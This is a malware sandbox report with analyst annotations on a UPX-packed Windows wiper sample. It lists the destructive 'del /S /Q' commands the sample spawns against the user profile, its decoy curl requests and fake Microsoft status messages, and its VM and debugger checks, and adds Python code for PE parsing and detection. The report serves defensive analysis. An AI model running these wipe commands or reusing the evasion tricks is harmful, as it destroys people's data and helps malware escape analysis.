Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtdc c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jttc c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtd c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtt c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.txt c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.exe c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.log c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dot c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul (identical command line reported 14 times)
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul (identical command line reported 19 times)
Note on the curl lines: the response body goes to nul, so these requests fetch nothing the sample uses; they only generate outbound traffic with a chosen Referer (-e) and User-Agent (-A). Neither cmd.exe nor the Windows C runtime treats single quotes as grouping characters, so the User-Agent value is split at its spaces: curl receives -A 'Mozilla and then a run of stray tokens (/, 5.0, (Windows, ...) that it tries as additional URLs before the real one; -s hides the resulting errors, and curl still continues to the final URL.
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: unknown unknown (reported 3 times)
Source: Z0hOr2pD7k.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Code function: 0_2_00A528C0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 0_2_00A528C0
Note: an entry point that resolves imports by name through LoadLibraryA/GetProcAddress and then re-protects memory with VirtualProtect is the UPX decompression stub, which matches the UPX0/UPX1 section names below. The import table visible in the file on disk is therefore the stub's, not the payload's; unpack first (upx -d, or dump the process after the stub's final jump) before reasoning about imports.
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
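The section names and DllCharacteristics flags reported above are read straight from the PE headers. The following Python is added here as an example; it is not part of the Joe Sandbox report and not the sample's code. It walks the DOS header, COFF header, optional header and section table with the standard library only. The image it parses is a header-only PE32 that build_minimal_pe32() constructs for the demonstration (an assumption, not the sample's bytes), and the UPX section-name set is the default UPX0/UPX1/UPX2 naming.

```python
"""Read PE section names and DllCharacteristics with the standard library only.

Added example (not part of this report): reproduces the two static facts above,
the UPX0/UPX1 section names and the DYNAMIC_BASE, NX_COMPAT and
TERMINAL_SERVER_AWARE flags, by parsing the PE headers. The image it parses is
built by build_minimal_pe32() as a constructed, header-only test input; it is not
the analysed sample.
"""
import struct

# IMAGE_DLLCHARACTERISTICS_* bit values from winnt.h
DLL_CHARACTERISTICS = {
    0x0040: "DYNAMIC_BASE",          # ASLR opt-in
    0x0100: "NX_COMPAT",             # DEP opt-in
    0x8000: "TERMINAL_SERVER_AWARE",
}
UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}   # default names written by the UPX packer


def parse_pe(data: bytes) -> dict:
    """Return section names, DllCharacteristics names and a UPX verdict for a PE32/PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)          # IMAGE_DOS_HEADER.e_lfanew
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic not in (0x10B, 0x20B):                              # PE32 / PE32+
        raise ValueError(f"unexpected optional header magic {magic:#x}")
    # DllCharacteristics sits at offset 70 of the optional header in both PE32 and PE32+
    (dllchars,) = struct.unpack_from("<H", data, opt + 70)
    table = opt + opt_size                                       # section table follows the optional header
    sections = []
    for i in range(nsections):
        raw = data[table + i * 40: table + i * 40 + 8]           # IMAGE_SECTION_HEADER.Name, 8 bytes
        sections.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    flags = sorted(name for bit, name in DLL_CHARACTERISTICS.items() if dllchars & bit)
    return {
        "sections": sections,
        "dll_characteristics": flags,
        "upx_packed": any(s in UPX_SECTION_NAMES for s in sections),
    }


def build_minimal_pe32(section_names, dllchars: int) -> bytes:
    """Construct a header-only PE32 image for testing (constructed input, not loadable)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 224                                   # IMAGE_OPTIONAL_HEADER32 incl. 16 data directories
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)            # PE32 magic
    struct.pack_into("<H", opt, 68, 3)               # IMAGE_SUBSYSTEM_WINDOWS_CUI
    struct.pack_into("<H", opt, 70, dllchars)
    table = b"".join(n.encode("ascii").ljust(8, b"\0") + b"\0" * 32 for n in section_names)
    return dos + b"PE\0\0" + coff + bytes(opt) + table


if __name__ == "__main__":
    # Mirrors the report: UPX sections plus the three flags (0x0040 | 0x0100 | 0x8000 = 0x8140).
    print(parse_pe(build_minimal_pe32(["UPX0", "UPX1", ".rsrc"], 0x8140)))
```

UPX carries the original optional header over into the packed file, so DYNAMIC_BASE and NX_COMPAT describe how the packed sample is loaded (ASLR and DEP apply to it). The section names are the cheap static tell; a packer build with renamed sections would need an entropy or entry-point-in-last-section check instead.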

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation
Note on this signature: none of the command lines below names the sample. Each del call receives two arguments, a wildcard such as *.docm, which del resolves relative to the working directory, and the bare directory c:\users\%username%\. When del is handed a directory it deletes every file in it, /S extends that to all subdirectories and /Q drops the confirmation prompt, so each of these calls attempts to remove everything the user can delete beneath their own profile (read-only files are skipped without /F, hidden and system files without /A). The sample's own location under C:\Users\user\ merely falls inside that tree; read the title as a side effect of a profile-wide wipe, which is what the wiper tag on the sample reflects, rather than as deliberate self-removal. The .jtd, .jtt, .jtdc and .jttc extensions in the full list belong to the JustSystems Ichitaro word processor, which points at Japanese-language targets. Duplicate entries collapsed:
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtdc c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jttc c:\users\%username%\ > nul
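A detection written against the command lines in this section, added here as an example; it is not taken from the report or from the sample. It assumes Sysmon-style process-creation records with a CommandLine field (the records in the block are constructed from the lines above, not real telemetry), a small hand-picked set of curl options that take a value, and a simplified Windows argument splitter that honours double quotes only, which is enough to show why the single-quoted User-Agent falls apart.

```python
"""Flag the wiper-style cmd.exe command lines listed in this report.

Added example, not part of the sandbox report or of the sample. It applies two
observations about the command lines above to constructed Sysmon-style records:
del with /S /Q and a bare directory argument (c:\\users\\%username%\\) deletes every
file below that directory, not only the wildcard; and the curl calls discard their
output and quote with single quotes, which the Windows C runtime does not honour.
"""
from __future__ import annotations
import re

CURL_VALUE_OPTS = {"-e", "-A", "-o", "-H", "-X", "-d", "-u", "-x"}   # options taking a value (subset, assumed)
USER_PROFILE_RE = re.compile(r"^[a-z]:\\users\\", re.IGNORECASE)
NUL_REDIRECT_RE = re.compile(r">\s*nul\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def split_windows_args(cmdline: str) -> list[str]:
    """Split like the Windows C runtime: whitespace separates, only double quotes group,
    single quotes are ordinary characters (backslash escapes omitted; unused here)."""
    args, cur, in_quotes = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if cur:
                args.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        args.append("".join(cur))
    return args


def inner_command(cmdline: str) -> list[str]:
    """argv that 'cmd.exe /c' hands to the child, minus cmd's own redirection."""
    argv = split_windows_args(cmdline)
    if len(argv) >= 2 and argv[0].lower().endswith("cmd.exe") and argv[1].lower() == "/c":
        argv = argv[2:]
    for i, a in enumerate(argv):
        if ">" in a:                      # '> nul', '>nul', '2>nul' are consumed by cmd.exe
            return argv[:i]
    return argv


def classify(cmdline: str) -> list[str]:
    """Findings for one command line; an empty list means nothing of interest."""
    argv = inner_command(cmdline)
    if not argv:
        return []
    verb, findings = argv[0].lower(), []
    if verb == "del":
        switches = {a.lower() for a in argv[1:] if a.startswith("/")}
        if {"/s", "/q"} <= switches:
            findings.append("del: recursive and unprompted (/S /Q)")
        for t in (a for a in argv[1:] if not a.startswith("/")):
            # A trailing backslash (the form used by this sample) marks a directory argument;
            # del <directory> means every file in it, and with /S every file below it.
            if t.endswith("\\"):
                scope = "user profile" if USER_PROFILE_RE.match(t) else "directory"
                findings.append(f"del: directory argument {t}: every file under the {scope} is deleted")
            elif "*" in t or "?" in t:
                findings.append(f"del: wildcard {t} applied relative to the working directory")
    elif verb == "curl":
        opts, positional, i = {}, [], 1
        while i < len(argv):
            a = argv[i]
            if a in CURL_VALUE_OPTS and i + 1 < len(argv):
                opts[a] = argv[i + 1]
                i += 1
            elif a.startswith("-"):
                opts[a] = None
            else:
                positional.append(a)
            i += 1
        urls = [p for p in positional if URL_RE.match(p)]
        stray = [p for p in positional if not URL_RE.match(p)]
        if NUL_REDIRECT_RE.search(cmdline):
            findings.append("curl: response discarded (> nul), traffic generation rather than a download")
        if opts.get("-e"):
            findings.append(f"curl: Referer set explicitly to {opts['-e']}")
        agent = opts.get("-A")
        if agent and "'" in agent:
            findings.append(f"curl: single quotes do not group on Windows; User-Agent actually sent is "
                            f"{agent!r} and {len(stray)} leftover token(s) become extra URL arguments")
        findings.extend(f"curl: requests {u}" for u in urls)
    return findings


def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """(index, findings) for every record that trips at least one rule."""
    return [(i, f) for i, ev in enumerate(events) if (f := classify(ev["CommandLine"]))]


# Constructed Sysmon EventID 1 style records modelled on the report; not real telemetry.
PARENT = r"C:\Users\user\Desktop\Z0hOr2pD7k.exe"
SAMPLE_EVENTS = [
    {"ParentImage": PARENT, "CommandLine": r"C:\Windows\system32\cmd.exe /c echo Wait a minute..."},
    {"ParentImage": PARENT, "CommandLine": r"C:\Windows\system32\cmd.exe /c del /S /Q *.doc c:\users\%username%\ > nul"},
    {"ParentImage": PARENT, "CommandLine": r"C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com "
     r"-A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' "
     r"https://www.xvideos.com/video64080443/_ > nul"},
    {"ParentImage": r"C:\Windows\explorer.exe",   # benign: one quoted file, no /S, stays silent
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c del /Q "C:\Users\user\Desktop\old notes.txt"'},
]

if __name__ == "__main__":
    for idx, found in scan(SAMPLE_EVENTS):
        print(idx, *found, sep="\n  ")
```

Run stand-alone it reports records 1 and 2 only. The del line is flagged for its /S /Q switches and for the directory argument under the user profile; the curl line for the discarded output, the explicit Referer and the single-quote split, which leaves curl with the User-Agent 'Mozilla and fourteen stray tokens that it tries as URLs and silently fails on under -s before still requesting the real one. The benign single-file delete produces no findings, which is the false-positive check a rule like this needs before it goes into a SIEM.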

Malware Analysis System Evasion:

Contains functionality to detect virtual machines (IN, VMware)
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Code function: 0_2_009C1400 in eax, dx 0_2_009C1400
Note: IN from the port named in DX is a privileged instruction. On bare metal, executing it from user mode raises a privileged-instruction exception, whereas VMware's backdoor interface answers on its magic I/O port, so the instruction's outcome (data in EAX versus an exception, normally caught by a handler) tells the sample whether it runs under VMware. The report shows the instruction only, not the port or magic values the sample loads.
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 408
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (reported twice)
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Code function: 0_2_009C14A0 Sleep,72A73930,72A73930,GetModuleFileNameA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,769F8030,CloseHandle,GetTickCount64,Sleep,Sleep,769F8030,EnumWindows,CreateFileA,IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent,KiUserExceptionDispatcher,KiUserExceptionDispatcher,Sleep,CloseHandle, 0_2_009C14A0
Note: this one routine carries most of the behaviour the report flags. It reads its own module path (GetModuleFileNameA) immediately before CreateProcessA, paces itself with Sleep and GetTickCount64, walks top-level windows with EnumWindows, and only then asks IsDebuggerPresent and CheckRemoteDebuggerPresent; the unresolved call targets 72A73930 and 769F8030 are addresses the disassembler could not name, most likely in loaded DLLs. The DebugPort query below is the kernel-side counterpart: CheckRemoteDebuggerPresent is implemented with NtQueryInformationProcess(ProcessDebugPort).
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Code function: 0_2_00A528C0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 0_2_00A528C0
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Code function: 0_2_009C22F8 SetUnhandledExceptionFilter, 0_2_009C22F8
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Code function: 0_2_009C2195 IsProcessorFeaturePresent,72A73930,72A73930,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_009C2195
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Code function: 0_2_009C19E3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_009C19E3
Note: the three SetUnhandledExceptionFilter/UnhandledExceptionFilter functions, including the IsDebuggerPresent call beside IsProcessorFeaturePresent, are consistent with the MSVC runtime's startup and fast-fail boilerplate rather than sample-specific checks; the deliberate anti-debugging logic is the one in 0_2_009C14A0 above.
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Microsoft Windows 10 self error check has been ready...Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2015 Microsoft CorporationJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2021 Adobe CorporationJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo DO NOT STOP THE PROCESSJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Wait a minute...Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c @echo OFFJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.doc c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docm c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docx c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dot c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pdf c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.csv c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xls c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsx c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsm c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.ppt c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptx c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptm c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtdc c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jttc c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtd c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtt c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.txt c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.exe c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.log c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dot c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: unknown unknown
Source: Z0hOr2pD7k.exe, 00000000.00000002.917417847.0000000001930000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: Z0hOr2pD7k.exe, 00000000.00000002.917417847.0000000001930000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
